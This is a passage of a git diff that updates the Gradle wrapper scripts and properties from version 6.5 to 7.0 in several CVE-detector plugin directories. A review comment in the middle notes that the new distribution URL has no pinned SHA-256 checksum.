@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
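Review bot: The new `distributionUrl` in the cve20179805 gradle-wrapper.properties hunk has no `distributionSha256Sum` next to it, so the wrapper downloads gradle-7.0-bin.zip and runs it without checking the archive against a pinned digest. As far as I know, `validateDistributionUrl=true` concerns the URL rather than the archive contents, so it does not cover this. I would add `distributionSha256Sum=<SHA-256 published by Gradle for gradle-7.0-bin.zip>` after the `distributionUrl` line. The same applies to the identical properties hunks for cve201811776 and cve20187600 further down. The commit also replaces gradle-wrapper.jar as a binary (index 62d4c0535..d64cd4917), which the diff cannot show, so its checksum should be compared with the wrapper checksum Gradle publishes before merging.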
diff --git a/google/detectors/rce/cve20179805/gradlew b/google/detectors/rce/cve20179805/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20179805/gradlew +++ b/google/detectors/rce/cve20179805/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20179805/gradlew.bat b/google/detectors/rce/cve20179805/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20179805/gradlew.bat +++ b/google/detectors/rce/cve20179805/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/cve201811776/gradlew b/google/detectors/rce/cve201811776/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve201811776/gradlew +++ b/google/detectors/rce/cve201811776/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve201811776/gradlew.bat b/google/detectors/rce/cve201811776/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve201811776/gradlew.bat +++ b/google/detectors/rce/cve201811776/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
